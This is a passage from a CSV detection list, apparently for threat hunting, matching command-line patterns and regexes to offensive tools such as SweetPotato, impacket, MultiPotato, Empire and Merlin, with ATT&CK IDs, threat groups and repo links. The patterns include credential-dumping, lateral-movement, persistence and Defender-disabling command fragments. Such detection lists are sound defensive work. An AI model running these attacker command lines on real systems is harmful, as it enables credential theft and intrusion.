A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* SweetPotato by @_EthicalChaos*",".{0,1000}\sSweetPotato\sby\s\@_EthicalChaos.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","0","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "* Sweetpotato.exe*",".{0,1000}\sSweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* --syscalls 
GetSyscallStub*",".{0,1000}\s\-\-syscalls\sGetSyscallStub.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -syscalls -sleep=*.exe*",".{0,1000}\s\-syscalls\s\-sleep\=.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* --syscalls SysWhispers3*",".{0,1000}\s\-\-syscalls\sSysWhispers3.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" 
"* -system * -ntds *ntds.dit*",".{0,1000}\s\-system\s.{0,1000}\s\-ntds\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "* -system SYSTEM -ntds NTDS.dit LOCAL*",".{0,1000}\s\-system\sSYSTEM\s\-ntds\sNTDS\.dit\sLOCAL.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -system SYSTEM -ntds NTDS.dit -outputfile*",".{0,1000}\s\-system\sSYSTEM\s\-ntds\sNTDS\.dit\s\-outputfile.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* --syswhispers --jump*",".{0,1000}\s\-\-syswhispers\s\-\-jump.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* SysWhispers*",".{0,1000}\sSysWhispers.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*",".{0,1000}\s\-t\s.{0,1000}https\:\/\/autodiscover\..{0,1000}\/autodiscover\/autodiscover\.xml.{0,1000}autodiscover.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "* -t 127.0.0.1 -p 1337 *",".{0,1000}\s\-t\s127\.0\.0\.1\s\-p\s1337\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "* -t BindShell -p *pwned\pipe\spoolss*",".{0,1000}\s\-t\sBindShell\s\-p\s.{0,1000}pwned\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "* -t C2concealer *",".{0,1000}\s\-t\sC2concealer\s.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "* -t CreateProcessAsUserW -p *pwned\pipe\spoolss* -e 
*.exe*",".{0,1000}\s\-t\sCreateProcessAsUserW\s\-p\s.{0,1000}pwned\\pipe\\spoolss.{0,1000}\s\-e\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "* -t dcsync://* -*",".{0,1000}\s\-t\sdcsync\:\/\/.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -t donut *",".{0,1000}\s\-t\sdonut\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* -t pe2sh*",".{0,1000}\s\-t\spe2sh.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* -t schtaskbackdoor *",".{0,1000}\s\-t\sschtaskbackdoor\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "* T:U- 
odusN*",".{0,1000}\sT\:U\-\sodusN.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "* t2w.py*",".{0,1000}\st2w\.py.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "* -Target * -AllDomain *",".{0,1000}\s\-Target\s.{0,1000}\s\-AllDomain\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Target * -InitialGrooms *",".{0,1000}\s\-Target\s.{0,1000}\s\-InitialGrooms\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Target * -Shellcode *",".{0,1000}\s\-Target\s.{0,1000}\s\-Shellcode\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --target=* --payload=*cmd.exe /c*",".{0,1000}\s\-\-target\=.{0,1000}\s\-\-payload\=.{0,1000}cmd\.exe\s\/c.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "* -target-domain * -outputfile * -no-pass*",".{0,1000}\s\-target\-domain\s.{0,1000}\s\-outputfile\s.{0,1000}\s\-no\-pass.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* targetedKerberoast.py *",".{0,1000}\stargetedKerberoast\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -target-ip * -remote-dll *.dll* -local-dll *",".{0,1000}\s\-target\-ip\s.{0,1000}\s\-remote\-dll\s.{0,1000}\.dll.{0,1000}\s\-local\-dll\s.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "* --target-name * --domain * --dc-ip * --executable *.exe*",".{0,1000}\s\-\-target\-name\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-\-executable\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & 
Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "* -Targets * -Method * -LocalAuth*",".{0,1000}\s\-Targets\s.{0,1000}\s\-Method\s.{0,1000}\s\-LocalAuth.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Targets All -Method WMI*",".{0,1000}\s\-Targets\sAll\s\-Method\sWMI.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Targets DCs*",".{0,1000}\s\-Targets\sDCs.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* targets-asn.nse*",".{0,1000}\stargets\-asn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-map4to6.nse*",".{0,1000}\stargets\-ipv6\-map4to6\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-multicast-echo.nse*",".{0,1000}\stargets\-ipv6\-multicast\-echo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-multicast-invalid-dst.nse*",".{0,1000}\stargets\-ipv6\-multicast\-invalid\-dst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-multicast-mld.nse*",".{0,1000}\stargets\-ipv6\-multicast\-mld\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-multicast-slaac.nse*",".{0,1000}\stargets\-ipv6\-multicast\-slaac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-wordlist.nse*",".{0,1000}\stargets\-ipv6\-wordlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-sniffer.nse*",".{0,1000}\stargets\-sniffer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-traceroute.nse*",".{0,1000}\stargets\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-xml.nse*",".{0,1000}\stargets\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --target-user * --dc-ip * -command *",".{0,1000}\s\-\-target\-user\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-command\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "* -TaskName RedPillTask*",".{0,1000}\s\-TaskName\sRedPillTask.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - 
T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","windows Scheduled TaskName","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* Tater.ps1*",".{0,1000}\sTater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* tdotnet publish Athena *",".{0,1000}\stdotnet\spublish\sAthena\s.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
